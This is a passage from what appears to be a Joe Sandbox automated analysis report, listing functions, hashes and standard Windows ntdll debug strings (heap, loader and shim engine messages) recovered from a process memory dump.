                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                                      • API String ID: 3446177414-1700792311
                                                                                                                                                      • Opcode ID: 0af8edec5393ccbb994a6fa1d6aafb7640d0cf89052f3e08e6b32a6d259a23f6
                                                                                                                                                      • Instruction ID: 2c0afd6589bc538a8f1c5e1512e9740959f9036e46fc9fb43d9b47aa75b8d8d2
                                                                                                                                                      • Opcode Fuzzy Hash: 0af8edec5393ccbb994a6fa1d6aafb7640d0cf89052f3e08e6b32a6d259a23f6
                                                                                                                                                      • Instruction Fuzzy Hash: 4DD1F335504685DFCB22CFA8C490AADBBF6FF89310F048A5EE8459B752D735A981CF10
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8C0680, Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 414COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                      • API String ID: 0-4253913091
                                                                                                                                                      • Opcode ID: 88da66ffb26acf61d7442b21fff1a321b7c1c718d73947058aa74cdc301fd89e
                                                                                                                                                      • Instruction ID: 8ad0d6fb811714eca10da0fc7248ad4eace876b97c163c49f6ccbaad1d8db7a4
                                                                                                                                                      • Opcode Fuzzy Hash: 88da66ffb26acf61d7442b21fff1a321b7c1c718d73947058aa74cdc301fd89e
                                                                                                                                                      • Instruction Fuzzy Hash: 3CF1BE74A0064ADFDB05CF69C890BAAB7B6FF86740F14866DE4159B381D734E982CF90
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E98ACEB, Relevance: 6.4, APIs: 4, Instructions: 450timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3446177414-0
                                                                                                                                                      • Opcode ID: 375523c332eeb3efdbe689127e94438d8dcd868dc67ca018378924086731b63e
                                                                                                                                                      • Instruction ID: 22b94db48604072f8e2a00f7b2bff2ce94679b6ccc06c27598edd14712258bfe
                                                                                                                                                      • Opcode Fuzzy Hash: 375523c332eeb3efdbe689127e94438d8dcd868dc67ca018378924086731b63e
                                                                                                                                                      • Instruction Fuzzy Hash: 74F11672E006598FCB19CF68C8A0A7DBBF6AF8820071A476DD456DB394E774E941CF50
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8CCF00, Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 345timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • RtlDebugPrintTimes.NTDLL ref: 1E8CD2C4
                                                                                                                                                        • Part of subcall function 1E938514: RtlDebugPrintTimes.NTDLL ref: 1E938579
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: ,s$p-s
                                                                                                                                                      • API String ID: 3446177414-239768544
                                                                                                                                                      • Opcode ID: ee61efc8f23f51817f5ac008fb852cc6471b016651712ac80cb5a8aa263f1dac
                                                                                                                                                      • Instruction ID: 6952973b656c954eb8d95102ee6b9e61515b825fa185ee9abb4c7b09037b26af
                                                                                                                                                      • Opcode Fuzzy Hash: ee61efc8f23f51817f5ac008fb852cc6471b016651712ac80cb5a8aa263f1dac
                                                                                                                                                      • Instruction Fuzzy Hash: 02D1D734A003699FEB14DF29C890BDAB7B2BF86304F054699D909A72C1DB74ED85CF91
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E98A1F0, Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 285timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: HEAP:
                                                                                                                                                      • API String ID: 3446177414-2466845122
                                                                                                                                                      • Opcode ID: a40a5f473b1f0cf0c69d9f80fd5a44d0e75e4abb5d132201cf64007cb28200e3
                                                                                                                                                      • Instruction ID: ba22ce24be896bb6e49efbbea1a5bf780cbd73c5d388c40602c0ebde9fa07885
                                                                                                                                                      • Opcode Fuzzy Hash: a40a5f473b1f0cf0c69d9f80fd5a44d0e75e4abb5d132201cf64007cb28200e3
                                                                                                                                                      • Instruction Fuzzy Hash: E1A18E7161821A8FC745CE28C894E2AB7E6FF98314F054A6EE945DB360E7B4EC41CF91
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8E7550, Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 194COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 1E924592
                                                                                                                                                      • ExecuteOptions, xrefs: 1E9244AB
                                                                                                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 1E924530
                                                                                                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 1E924507
                                                                                                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 1E924460
                                                                                                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 1E92454D
                                                                                                                                                      • Execute=1, xrefs: 1E92451E
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                      • API String ID: 0-484625025
                                                                                                                                                      • Opcode ID: 68c7b5241be878527d4139e8a70a5ca4e923075c703e2306a0e68d2472f2818d
                                                                                                                                                      • Instruction ID: 9f5fd33b0901870ab60edc0c253b26bc7fb6f5b3a6bf0ba6dd0cd328526627c2
                                                                                                                                                      • Opcode Fuzzy Hash: 68c7b5241be878527d4139e8a70a5ca4e923075c703e2306a0e68d2472f2818d
                                                                                                                                                      • Instruction Fuzzy Hash: 4E512835A00259BBEF10ABE9DC95FAD73B9EF49304F000BADE505A76C0E771AA458F50
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8CA170, Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      • RtlpFindActivationContextSection_CheckParameters, xrefs: 1E9177DD, 1E917802
                                                                                                                                                      • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1E9177E2
                                                                                                                                                      • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 1E9178F3
                                                                                                                                                      • Actx , xrefs: 1E917819, 1E917880
                                                                                                                                                      • SsHd, xrefs: 1E8CA304
                                                                                                                                                      • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1E917807
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                                                                                                      • API String ID: 0-1988757188
                                                                                                                                                      • Opcode ID: 38f28e8324584f753280e1d1fdb86af915b42fb367cde38086f9af5baf33909f
                                                                                                                                                      • Instruction ID: b0f5a561f0e14f9883b8801090afa7116563c0963e45700da961217d5cbd5f86
                                                                                                                                                      • Opcode Fuzzy Hash: 38f28e8324584f753280e1d1fdb86af915b42fb367cde38086f9af5baf33909f
                                                                                                                                                      • Instruction Fuzzy Hash: F5E1D170A043468FD715CF65C9A0B9AF7E6BF86224F104BADE866CB2D0D731D845CB81
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8CD690, Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 372timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • RtlpFindActivationContextSection_CheckParameters, xrefs: 1E91914E, 1E919173
                                                                                                                                                      • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1E919153
                                                                                                                                                      • Actx , xrefs: 1E919315
                                                                                                                                                      • GsHd, xrefs: 1E8CD794
                                                                                                                                                      • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 1E919372
                                                                                                                                                      • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1E919178
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                                                                                                      • API String ID: 3446177414-2196497285
                                                                                                                                                      • Opcode ID: 39e568aa5e97859da72d087657729e9edb47046c33339f0de35c10a510ebb4dc
                                                                                                                                                      • Instruction ID: 8cb2b3911b704a202e9d2fdb0f0fb3e7eed4f5ca16d285c3a435b84e11cf4631
                                                                                                                                                      • Opcode Fuzzy Hash: 39e568aa5e97859da72d087657729e9edb47046c33339f0de35c10a510ebb4dc
                                                                                                                                                      • Instruction Fuzzy Hash: 78E18B706083468FD711DF19C890B9AB7E6FF89328F044B2DE9959B2C1D770E985CB92
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E95F0A5, Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 231timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                                                                                      • API String ID: 3446177414-1745908468
                                                                                                                                                      • Opcode ID: a203ea23dde56675827ecd0ab54f6f4e50151de06bec282acdb102b504e167dc
                                                                                                                                                      • Instruction ID: 2d94a5c9a988b3e493ec3fa9cc57b77efa3ac50c77b673759c62eaa1c51d84ff
                                                                                                                                                      • Opcode Fuzzy Hash: a203ea23dde56675827ecd0ab54f6f4e50151de06bec282acdb102b504e167dc
                                                                                                                                                      • Instruction Fuzzy Hash: B591F039904685DFDB12CFA8C450AADBBF6FF89360F148A5EE845AB751C735A980CF10
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8DD6D0, Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 151timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • RtlDebugPrintTimes.NTDLL ref: 1E8DD879
                                                                                                                                                        • Part of subcall function 1E8B4779: RtlDebugPrintTimes.NTDLL ref: 1E8B4817
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: $$$$0,s$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                                                                                      • API String ID: 3446177414-2237523536
                                                                                                                                                      • Opcode ID: c1130e7e8669445e8c4ba47fa0d1b826a21e89d755ff5f5583e68731259bbb83
                                                                                                                                                      • Instruction ID: 77e7f194914af7331846821446534c7fd975cd5619fb499ed6ba79e2d4029400
                                                                                                                                                      • Opcode Fuzzy Hash: c1130e7e8669445e8c4ba47fa0d1b826a21e89d755ff5f5583e68731259bbb83
                                                                                                                                                      • Instruction Fuzzy Hash: 5A51B075A0838A9FDB05DFA8C48479DBBB2BF84324F244799D4016B2C1D774A989CB80
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8A640D, Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 150timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • RtlDebugPrintTimes.NTDLL ref: 1E8A651C
                                                                                                                                                        • Part of subcall function 1E8A6565: RtlDebugPrintTimes.NTDLL ref: 1E8A6614
                                                                                                                                                        • Part of subcall function 1E8A6565: RtlDebugPrintTimes.NTDLL ref: 1E8A665F
                                                                                                                                                      Strings
                                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 1E9097A0, 1E9097C9
                                                                                                                                                      • apphelp.dll, xrefs: 1E8A6446
                                                                                                                                                      • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 1E9097B9
                                                                                                                                                      • LdrpInitShimEngine, xrefs: 1E909783, 1E909796, 1E9097BF
                                                                                                                                                      • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 1E90977C
                                                                                                                                                      • Getting the shim engine exports failed with status 0x%08lx, xrefs: 1E909790
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                      • API String ID: 3446177414-204845295
                                                                                                                                                      • Opcode ID: c059ece442175e862d09354e45c88da8f0d86b3d29cef5a436d35730b6bb96eb
                                                                                                                                                      • Instruction ID: b26201a72db98c48a8fd27ac8551fc92e610eebc3401239488854cdd96f07028
                                                                                                                                                      • Opcode Fuzzy Hash: c059ece442175e862d09354e45c88da8f0d86b3d29cef5a436d35730b6bb96eb
                                                                                                                                                      • Instruction Fuzzy Hash: 4F518C766083449FD311DF24D890BABB7E9BFC4644F440A1DFA95972A4EB30E904DB92
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E92FA02, Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 109timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                                                                                                                      • API String ID: 3446177414-4227709934
                                                                                                                                                      • Opcode ID: 418b33b8c2c6ec15cec2ae322837331767e369f2d8b8cc52f7a7139c3d7458c1
                                                                                                                                                      • Instruction ID: 547ad52d1f5df5de6dd0bd51f64202b0da35348653418bbf5b0a0499c7004d3f
                                                                                                                                                      • Opcode Fuzzy Hash: 418b33b8c2c6ec15cec2ae322837331767e369f2d8b8cc52f7a7139c3d7458c1
                                                                                                                                                      • Instruction Fuzzy Hash: 88415E7590121AABCF02CF95C894AEEBBBABF88354F54022DE905B7344D7719941DF90
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E95F8F8, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 190timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                                                                                                                      • API String ID: 3446177414-3492000579
                                                                                                                                                      • Opcode ID: f91e6a1a3a1764e5881a8a5dc3c69109d257b6fd832e1517975bf961d946279f
                                                                                                                                                      • Instruction ID: aeaa8dcbf8dbce52ba6ce0f1a8adb7197c6c2d88cf2f96835c8eb15044b4c92e
                                                                                                                                                      • Opcode Fuzzy Hash: f91e6a1a3a1764e5881a8a5dc3c69109d257b6fd832e1517975bf961d946279f
                                                                                                                                                      • Instruction Fuzzy Hash: 7C71BE35904685EFCB02DFA8D8A0AADFBF6FF89220F04865EE4459B351D735A980CF50
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8A6565, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 1E909854, 1E909895
                                                                                                                                                      • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 1E909843
                                                                                                                                                      • LdrpLoadShimEngine, xrefs: 1E90984A, 1E90988B
                                                                                                                                                      • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 1E909885
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                                      • API String ID: 3446177414-3589223738
                                                                                                                                                      • Opcode ID: caf96870fc8b907e7af400f2a6f0ea852e67359adf276239a552d818ba73a0c2
                                                                                                                                                      • Instruction ID: 682e3a91715ebe75fade4b67ead3a57acf4bb3dda9fadc46434c60c8b781e3a4
                                                                                                                                                      • Opcode Fuzzy Hash: caf96870fc8b907e7af400f2a6f0ea852e67359adf276239a552d818ba73a0c2
                                                                                                                                                      • Instruction Fuzzy Hash: B551C575A143989FDB04DBACCC94AED77B6BFC0704F440729E951AB299DB70AC40DB80
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8DDA20, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                                                                                                      • API String ID: 3446177414-3224558752
                                                                                                                                                      • Opcode ID: b10a4a09f937279abed18b2da23fff095e618d6ad8f6b53dae843c8896c4aad7
                                                                                                                                                      • Instruction ID: ebe54a65b87e4b381568a7d8354f6c8a3860a487e46677da6f5bb182b6f66092
                                                                                                                                                      • Opcode Fuzzy Hash: b10a4a09f937279abed18b2da23fff095e618d6ad8f6b53dae843c8896c4aad7
                                                                                                                                                      • Instruction Fuzzy Hash: 31413635954789DFC722DF28C494B99B3A9FF40320F048B6DE8168B3C1C738A984CB90
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E95ECD7, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 128timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • HEAP: , xrefs: 1E95ECDD
                                                                                                                                                      • ---------------------------------------, xrefs: 1E95EDF9
                                                                                                                                                      • Entry Heap Size , xrefs: 1E95EDED
                                                                                                                                                      • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 1E95EDE3
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                                                                                                                                      • API String ID: 3446177414-1102453626
                                                                                                                                                      • Opcode ID: 2c55faccb35043b79ec81085057293245eaa467a498317241b3f1f7b0adc4b37
                                                                                                                                                      • Instruction ID: c868dafd79be457cf34d8ee75ffd9967d4b38b90fae92619c0905e85f5acb4a6
